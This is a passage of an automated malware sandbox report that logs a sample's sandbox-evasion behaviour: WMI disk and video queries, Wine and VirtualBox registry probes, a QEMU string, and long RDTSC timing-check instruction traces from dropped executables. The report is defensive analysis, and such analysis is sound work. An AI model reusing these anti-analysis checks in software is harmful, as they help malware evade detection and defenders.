Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\]Q
Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,]Q
Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDE81E second address: DDE840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DDE840 second address: DDE845 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74BB8 second address: F74BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnp 00007F1F50CBBC3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74BC5 second address: F74BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74BC9 second address: F74BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F74BCF second address: F74BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6661A second address: F66627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73D11 second address: F73D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73E40 second address: F73E6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F1F50CBBC3Bh 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F1F50CBBC36h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73E6E second address: F73E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F73E72 second address: F73E78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F744DE second address: F74507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jl 00007F1F50F77976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F50F77985h 0x00000013 jnp 00007F1F50F77976h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F773E0 second address: F773FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F50CBBC3Dh 0x00000008 jns 00007F1F50CBBC36h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F774DB second address: F774EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F7797Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F774EE second address: F77537 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub ecx, dword ptr [ebp+122D27B5h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F1F50CBBC38h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov edx, 5E3CD361h 0x00000036 push FCEF953Ch 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77537 second address: F7759E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 add dword ptr [esp], 03106B44h 0x0000000e mov dword ptr [ebp+122D19A7h], edi 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D18F5h], ebx 0x0000001e push 00000003h 0x00000020 movzx edi, si 0x00000023 push A269BCA5h 0x00000028 jmp 00007F1F50F77986h 0x0000002d xor dword ptr [esp], 6269BCA5h 0x00000034 mov edx, dword ptr [ebp+122D3592h] 0x0000003a lea ebx, dword ptr [ebp+1246C327h] 0x00000040 sub esi, 133A1307h 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push esi 0x0000004c pop esi 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 jc 00007F1F50F77976h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7759E second address: F775BE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F50CBBC42h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7767C second address: F776E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77980h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F1F50F77980h 0x0000000f popad 0x00000010 xor dword ptr [esp], 64A30400h 0x00000017 je 00007F1F50F77982h 0x0000001d jmp 00007F1F50F7797Ch 0x00000022 push 00000003h 0x00000024 xor dx, 8A94h 0x00000029 xor ecx, 3B861720h 0x0000002f push 00000000h 0x00000031 mov esi, dword ptr [ebp+122D3406h] 0x00000037 push 00000003h 0x00000039 or ecx, 0CBBA4D0h 0x0000003f call 00007F1F50F77979h 0x00000044 push eax 0x00000045 push edx 0x00000046 push ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F776E5 second address: F776EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F776EA second address: F776EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F776EF second address: F77737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F1F50CBBC3Ah 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F1F50CBBC45h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1F50CBBC49h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77737 second address: F7774D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1F50F77978h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7774D second address: F77757 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F50CBBC36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F77757 second address: F7775D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7775D second address: F77790 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+122D3552h] 0x0000000f lea ebx, dword ptr [ebp+1246C330h] 0x00000015 add dword ptr [ebp+122D3021h], esi 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f jmp 00007F1F50CBBC43h 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7783D second address: F77841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7796D second address: F77972 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96407 second address: F96411 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F50F7797Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F965B1 second address: F965B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F968C4 second address: F968C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F968C8 second address: F968CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F968CE second address: F968D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F968D7 second address: F96909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC44h 0x00000009 pop edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F1F50CBBC4Ah 0x00000013 jmp 00007F1F50CBBC3Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96909 second address: F9690D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96A8E second address: F96A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F1F50CBBC36h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F96CE3 second address: F96CED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F50F7797Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97291 second address: F972B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F972B0 second address: F972DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F1F50F77976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F1F50F77986h 0x00000014 pushad 0x00000015 popad 0x00000016 js 00007F1F50F77976h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F972DF second address: F972E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F972E8 second address: F972F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F50F77976h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F972F2 second address: F9730A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97487 second address: F97490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97490 second address: F97494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97494 second address: F9749C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F975E4 second address: F97615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F1F50CBBC40h 0x0000000f ja 00007F1F50CBBC3Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C7B0 second address: F8C7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C7B4 second address: F8C7D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F8C7D1 second address: F8C7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97D5C second address: F97D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97D60 second address: F97D6A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1F50F77976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97D6A second address: F97D73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97ED8 second address: F97EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F1F50F77976h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F97EE4 second address: F97EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9806F second address: F98075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98075 second address: F98079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98079 second address: F98082 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98082 second address: F98088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98088 second address: F98098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1F50F77976h 0x0000000a popad 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F98098 second address: F980B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1F50CBBC36h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F50CBBC3Fh 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9B971 second address: F9B977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F9E079 second address: F9E080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3773 second address: FA3791 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1F50F7797Ah 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F1F50F7797Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3BCE second address: FA3BD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3BD4 second address: FA3BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3BDD second address: FA3BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA3BE3 second address: FA3C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1F50F77976h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1F50F77983h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
